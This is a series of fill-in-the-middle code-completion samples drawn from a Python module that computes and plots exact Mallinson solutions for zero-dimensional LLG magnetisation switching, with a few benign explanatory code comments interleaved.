calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | """Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi) |
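# Sanity check for the wrapping helper used above: any real angle should land
# in [0, 2*pi). Standalone copy so it can run without the module:
from math import pi

def wrap_angle(azi):
    a = azi % (2*pi)
    if a < 0:
        a += 2*pi
    return a

assert 0 <= wrap_angle(-3*pi) < 2*pi
assert abs(wrap_angle(5*pi) - pi) < 1e-12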
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
<|fim_middle|>
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
    m_as_sph_points = [utils.array2sph(m) for m in ms]  # a real list: it is traversed twice below
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | a = azi % (2*pi)
if a < 0:
a += 2*pi
return a |
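# Aside: in Python the result of % with a positive modulus is already
# non-negative even for negative floats, so the `if a < 0` branch above is
# defensive rather than required (unlike C's fmod, which keeps the sign).
from math import pi
assert (-pi/4) % (2*pi) > 0   # 7*pi/4 in Python, not -pi/4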
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
<|fim_middle|>
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
    m_as_sph_points = [utils.array2sph(m) for m in ms]  # a real list: it is traversed twice below
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | """Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times) |
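# Portability note: `sp.linspace` works only while SciPy re-exports NumPy's
# top-level functions, which recent SciPy releases have dropped. NumPy is the
# safe spelling of the same grid construction:
from math import pi
import numpy as np

pols = np.linspace(pi/18, 17*pi/18, 1000)
assert len(pols) == 1000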
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
<|fim_middle|>
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
    m_as_sph_points = [utils.array2sph(m) for m in ms]  # a real list: it is traversed twice below
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | """Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show() |
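# plot_dynamics ends in plt.show(), which blocks until the window is closed
# and fails on display-less machines. A save-to-file variant (sketch; the
# filename is made up) sidesteps both issues:
import matplotlib
matplotlib.use("Agg")             # non-interactive backend, set before pyplot is used
import matplotlib.pyplot as plt

plt.figure()
plt.plot([0.0, 1.0], [0.0, 1.0])
plt.savefig("dynamics.png")       # written to disk instead of shown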
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
<|fim_middle|>
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
    m_as_sph_points = [utils.array2sph(m) for m in ms]  # a real list: it is traversed twice below
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | """Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis |
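# functools.partial, as used above, freezes the leading arguments of a
# function so the leftover argument can be mapped over a list; a miniature:
import functools as ft

def f(params, start, now):
    return (params, start, now)

g = ft.partial(f, "mag", 0.1)
assert [g(p) for p in (0.2, 0.3)] == [("mag", 0.1, 0.2), ("mag", 0.1, 0.3)]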
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
<|fim_middle|>
<|fim▁end|> | m_as_sph_points = map(utils.array2sph, ms)
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show() |
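# With numeric and exact trajectories on the same polar grid, a scalar error
# is often more telling than the overlaid plots drawn above (sketch):
def max_abs_error(computed, exact):
    return max(abs(c - e) for c, e in zip(computed, exact))

assert max_abs_error([1.0, 2.0], [1.0, 2.5]) == 0.5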
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
<|fim_middle|>
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
    m_as_sph_points = [utils.array2sph(m) for m in ms]  # a real list: it is traversed twice below
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | a += 2*pi |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def <|fim_middle|>(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
    m_as_sph_points = [utils.array2sph(m) for m in ms]  # a real list: it is traversed twice below
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | calculate_switching_time |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def <|fim_middle|>(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
    m_as_sph_points = [utils.array2sph(m) for m in ms]  # a real list: it is traversed twice below
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | calculate_azimuthal |
